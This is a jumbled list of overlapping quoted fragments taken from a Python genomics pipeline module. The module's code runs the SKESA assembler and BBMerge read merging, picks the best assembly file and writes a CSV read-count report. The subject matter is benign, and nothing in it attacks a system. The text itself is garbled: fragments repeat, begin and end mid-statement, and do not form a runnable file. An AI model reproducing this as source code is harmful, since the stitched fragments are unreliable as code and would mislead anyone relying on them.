== 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile =", "the results to the report if sample.name not in lines: with open(report, 'a+')", "Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble genomes", "reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\", ".format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq files, populate the metadata", "files if len(fastqfiles) == 2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble", "not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile,", "open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists,", "= run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout,", "'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus,", "of the report to store the metagenome file merging results report = os.path.join(self.reportpath,", "error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads", "if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads =", "paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file from the assembler", "merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err,", "def skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\" with progressbar(self.metadata) as bar:", "cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None,", "could be paired :param sample: metadata sample object flagged as a metagenome \"\"\"", "if len(fastqfiles) == 2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble =", "sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles", "If the sample is a pure isolate, assemble it. Otherwise, run the pre-metagenome", "--fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\", "len(fastqfiles) == 2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa", "reads(err_log): \"\"\" Parse the outputs from bbmerge to extract the total number of", "sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq =", "self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\" with progressbar(self.metadata) as", "inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile", ".format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs from bbmerge to", "the assembly file to 'NA' as assembly is not desirable for metagenomes sample.general.assemblyfile", "the report doesn't exist, create it with the header and the results from", "num_pairs = self.reads(error) # If the report doesn't exist, create it with the", "os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep all the merged FASTQ files", "open(err_log, 'r') as error_log: # Extract the necessary information for line in error_log:", "except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name of the report to", "forward fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz = True if", "sample.run.Description except AttributeError: status = 'unknown' if status == 'metagenome': self.merge(sample) else: #", "reads, as well as the number of reads that could be paired :param", "the sample is a pure isolate, assemble it. Otherwise, run the pre-metagenome pipeline", "sample in bar: # Initialise the assembly command sample.commands.assemble = str() try: if", "progressbar(self.metadata) as bar: for sample in bar: # Initialise the assembly command sample.commands.assemble", "err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile,", "Otherwise, run the pre-metagenome pipeline try: status = sample.run.Description except AttributeError: status =", "os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of the merged, and unmerged files", "samples have already been added - useful if re-running # the analysis else:", "bbtools from subprocess import CalledProcessError from click import progressbar import logging import shutil", "= os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just an empty file if", "err_log: bbmerge outputs the stats in the error file :return: num_reads, the total", "'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles", "'NA' # Can only merge paired-end if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory,", "os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set", "num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads", "pipelines. Create a report with the total number of reads, and the number", "line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the", "import CalledProcessError from click import progressbar import logging import shutil import os __author__", "os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout,", "pre-metagenome pipeline try: status = sample.run.Description except AttributeError: status = 'unknown' if status", "# Extract the total number of reads, and the number of reads that", "\"\"\" with progressbar(self.metadata) as bar: for sample in bar: # Initialise the assembly", "error file :return: num_reads, the total number of reads, paired_reads, number of paired", "there are two fastq files if len(fastqfiles) == 2: # Set the reverse", "\\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use single", "make_path(merge_path) # Set the name of the merged, and unmerged files sample.general.mergedreads =", "with progressbar(self.metadata) as bar: for sample in bar: # Initialise the assembly command", "files for use in metagenomics pipelines. Create a report with the total number", "of paired readds \"\"\" # Initialise variables num_reads = 0 paired_reads = 0", "added - useful if re-running # the analysis else: lines = list() with", "metagenome \"\"\" # Set the assembly file to 'NA' as assembly is not", "run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr,", "sample: metadata sample object flagged as a metagenome \"\"\" # Set the assembly", "just an empty file if size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile", "skesa to assemble genomes \"\"\" with progressbar(self.metadata) as bar: for sample in bar:", "\\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no", "sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self,", "err stream num_reads, num_pairs = self.reads(error) # If the report doesn't exist, create", "fastqfiles[0] gz = True if '.gz' in forward else False # If there", "# err stream num_reads, num_pairs = self.reads(error) # If the report doesn't exist,", "as the number of reads that could be paired :param err_log: bbmerge outputs", "assembly is not desirable for metagenomes sample.general.assemblyfile = 'NA' # Can only merge", "# Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores", "' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are", "not os.path.isfile(sample.general.mergedreads): # Run the merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads,", "= os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the merging command out,", "assembler is present. If not, set the .bestassembly attribute to 'NA' \"\"\" for", "= os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep all the merged FASTQ", "main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\" with", "1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq files,", "it with the header and the results from the first sample if not", "# Set the name of the report to store the metagenome file merging", "which samples have already been added - useful if re-running # the analysis", "make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess import CalledProcessError from click", "sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble,", "store the metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the", "def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path", "'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add", "'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name", "'NA' \"\"\" for sample in self.metadata: try: # Set the name of the", "\\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if", "if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err = run_subprocess(sample.commands.assemble)", "= fastqfiles forward = fastqfiles[0] gz = True if '.gz' in forward else", "Set the name of the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size", "useful if re-running # the analysis else: lines = list() with open(report, 'r')", "except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata =", "merged FASTQ files in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set", "== 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep all", "spades assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the", "name of the merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log", "the report to store the metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv')", "output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't", "else: sample.general.bestassemblyfile = 'NA' # Add the name and path of the filtered", "FASTQ files for use in metagenomics pipelines. Create a report with the total", "and the number of reads that could be paired :param sample: metadata sample", "if not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) #", "'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and", "analysis else: lines = list() with open(report, 'r') as report_file: for line in", "os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the unfiltered spades assembly output", "sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the name", "for metagenomes sample.general.assemblyfile = 'NA' # Can only merge paired-end if len(sample.general.fastqfiles) ==", "return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file from", "# Merge path - keep all the merged FASTQ files in one directory", "= os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta'", "be paired from the bbmerge # err stream num_reads, num_pairs = self.reads(error) #", "'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the unfiltered spades assembly output file", "of reads that could be paired from the bbmerge # err stream num_reads,", "no fastq files, populate the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq =", "# Initialise the assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If", "= 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles),", "= 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the", "= 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA'", "and path of the filtered file to the metadata sample.general.filteredfile = filtered_outputfile except", "'w') as log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError):", "assembly isn't just an empty file if size == 0: sample.general.bestassemblyfile = 'NA'", "= 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' #", "= fastqfiles[0] gz = True if '.gz' in forward else False # If", "paired from the bbmerge # err stream num_reads, num_pairs = self.reads(error) # If", "if size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile)", "open(report, 'r') as report_file: for line in report_file: lines.append(line.split(',')[0]) # Add the results", "run the pre-metagenome pipeline try: status = sample.run.Description except AttributeError: status = 'unknown'", "for sample in self.metadata: try: # Set the name of the filtered assembly", "doesn't exist, create it with the header and the results from the first", "information for line in error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif", "status == 'metagenome': self.merge(sample) else: # Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory,", "self.reads(error) # If the report doesn't exist, create it with the header and", "only merge paired-end if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) #", "err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as log_file: log_file.write(out) with", "= 0 paired_reads = 0 # Open the log file with open(err_log, 'r')", "variables num_reads = 0 paired_reads = 0 # Open the log file with", "the merged FASTQ files in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) #", "= True if '.gz' in forward else False # If there are two", "of reads, as well as the number of reads that could be paired", "assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is", "stats in the error file :return: num_reads, the total number of reads, paired_reads,", "the first sample if not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name,", "directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of the merged,", "error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name of the report", "else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the", "delattr(sample.general, 'mergedreads') # Set the name of the report to store the metagenome", "report_file: lines.append(line.split(',')[0]) # Add the results to the report if sample.name not in", "= sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the name and", "are two fastq files if len(fastqfiles) == 2: # Set the reverse fastq", "sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample):", "inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path", "results from the first sample if not os.path.isfile(report): with open(report, 'w') as report_file:", "if '.gz' in forward else False # If there are two fastq files", "and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error", "to 'NA' as assembly is not desirable for metagenomes sample.general.assemblyfile = 'NA' #", "size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else:", "import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess import CalledProcessError from", "# Set the assembly file to 'NA' as assembly is not desirable for", "subprocess import CalledProcessError from click import progressbar import logging import shutil import os", "header and the results from the first sample if not os.path.isfile(report): with open(report,", "in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return", "the report if sample.name not in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n'", "open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse", "\"\"\" for sample in self.metadata: try: # Set the name of the filtered", "--vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above,", "from olctools.accessoryFunctions.accessoryFunctions import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess import", "a report with the total number of reads, and the number of reads", "filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata", "logging import shutil import os __author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble()", "in bar: # Initialise the assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles:", "len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep", "the bbmerge # err stream num_reads, num_pairs = self.reads(error) # If the report", "report if sample.name not in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name,", ".format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the", "'{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files sample.general.assemblyfastq", "two fastq files if len(fastqfiles) == 2: # Set the reverse fastq name", "from the assembler is present. If not, set the .bestassembly attribute to 'NA'", "else False # If there are two fastq files if len(fastqfiles) == 2:", "and the number of reads that could be paired from the bbmerge #", "the header and the results from the first sample if not os.path.isfile(report): with", "\"\"\" Parse the outputs from bbmerge to extract the total number of reads,", "determine which samples have already been added - useful if re-running # the", "\"\"\" # Initialise variables num_reads = 0 paired_reads = 0 # Open the", "from genewrappers.biotools import bbtools from subprocess import CalledProcessError from click import progressbar import", "the name of the merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name))", "be paired :param err_log: bbmerge outputs the stats in the error file :return:", "forward else False # If there are two fastq files if len(fastqfiles) ==", "outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep all the merged", "os __author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\"", "of reads, paired_reads, number of paired readds \"\"\" # Initialise variables num_reads =", "import shutil import os __author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile()", "file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the unfiltered", "threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq files, populate the metadata appropriately", "else: # Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile =", "if sample.name not in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads,", "inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies')) make_path(os.path.join(self.path, 'raw_assemblies')) make_path(self.reportpath) logging.info('Assembling", "sample.general.assemblyfile = 'NA' # Can only merge paired-end if len(sample.general.fastqfiles) == 2: outpath", "except AttributeError: status = 'unknown' if status == 'metagenome': self.merge(sample) else: # Set", "sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output =", "'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly", "fastqfiles forward = fastqfiles[0] gz = True if '.gz' in forward else False", "readds \"\"\" # Initialise variables num_reads = 0 paired_reads = 0 # Open", "1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but", "above, but use single read settings for the assembler else: sample.commands.assemble = 'skesa", "the merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out,", "self.metadata: try: # Set the name of the filtered assembly file filtered_outputfile =", "Use bbmerge to merge paired FASTQ files for use in metagenomics pipelines. Create", "= 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA'", "# Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output,", "num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file from the", "= filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject):", "'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq", "metadata sample object flagged as a metagenome \"\"\" # Set the assembly file", "'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile", "the name and path of the filtered file to the metadata sample.general.filteredfile =", "--fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile)", "it. Otherwise, run the pre-metagenome pipeline try: status = sample.run.Description except AttributeError: status", "# If there are no fastq files, populate the metadata appropriately else: sample.general.assembly_output", "total number of reads, as well as the number of reads that could", "Open the log file with open(err_log, 'r') as error_log: # Extract the necessary", "fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files sample.general.assemblyfastq = fastqfiles", "not, set the .bestassembly attribute to 'NA' \"\"\" for sample in self.metadata: try:", "= os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the unfiltered spades assembly", "# Same as above, but use single read settings for the assembler else:", "assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the", "of reads that could be paired :param err_log: bbmerge outputs the stats in", "files, populate the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile", "num_reads = 0 paired_reads = 0 # Open the log file with open(err_log,", "as bar: for sample in bar: # Initialise the assembly command sample.commands.assemble =", "if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path -", "for the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\", "{fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) #", "is not desirable for metagenomes sample.general.assemblyfile = 'NA' # Can only merge paired-end", "not desirable for metagenomes sample.general.assemblyfile = 'NA' # Can only merge paired-end if", "write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as log_file: log_file.write(out)", "file with open(err_log, 'r') as error_log: # Extract the necessary information for line", "the results from the first sample if not os.path.isfile(report): with open(report, 'w') as", "'unknown' if status == 'metagenome': self.merge(sample) else: # Set the output directory sample.general.assembly_output", "files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz = True if '.gz' in", "= 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\", "= os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run", "0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile =", "= 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus =", "have already been added - useful if re-running # the analysis else: lines", "in error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line:", "of the merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log =", "= 'NA' # Can only merge paired-end if len(sample.general.fastqfiles) == 2: outpath =", "name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent", "the total number of reads, paired_reads, number of paired readds \"\"\" # Initialise", "the number of reads that could be paired from the bbmerge # err", "os.path.isfile(sample.general.mergedreads): # Run the merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True,", "\"\"\" Determine whether the contigs.fasta output file from the assembler is present. If", "AttributeError: status = 'unknown' if status == 'metagenome': self.merge(sample) else: # Set the", "def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\"", "paired readds \"\"\" # Initialise variables num_reads = 0 paired_reads = 0 #", "sample is a pure isolate, assemble it. Otherwise, run the pre-metagenome pipeline try:", "output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile", "log file with open(err_log, 'r') as error_log: # Extract the necessary information for", "Determine whether the contigs.fasta output file from the assembler is present. If not,", "merge paired-end if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge", "the number of reads that could be paired :param sample: metadata sample object", "of the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) #", "sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles =", "pure isolate, assemble it. Otherwise, run the pre-metagenome pipeline try: status = sample.run.Description", "of reads that could be paired :param sample: metadata sample object flagged as", "been added - useful if re-running # the analysis else: lines = list()", "paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs from bbmerge to extract the", "extract the total number of reads, as well as the number of reads", "Set the the forward fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz", "error_log: # Extract the necessary information for line in error_log: if 'Pairs:' in", "merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of the merged, and", "the total number of reads, and the number of reads that could be", "directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile =", "# Add the name and path of the filtered file to the metadata", "in forward else False # If there are two fastq files if len(fastqfiles)", "and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble,", "bbmerge # err stream num_reads, num_pairs = self.reads(error) # If the report doesn't", "def reads(err_log): \"\"\" Parse the outputs from bbmerge to extract the total number", "if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just an", "Run the merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus)", "'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine", "as report_file: for line in report_file: lines.append(line.split(',')[0]) # Add the results to the", "err, self.logfile, sample.general.logout, 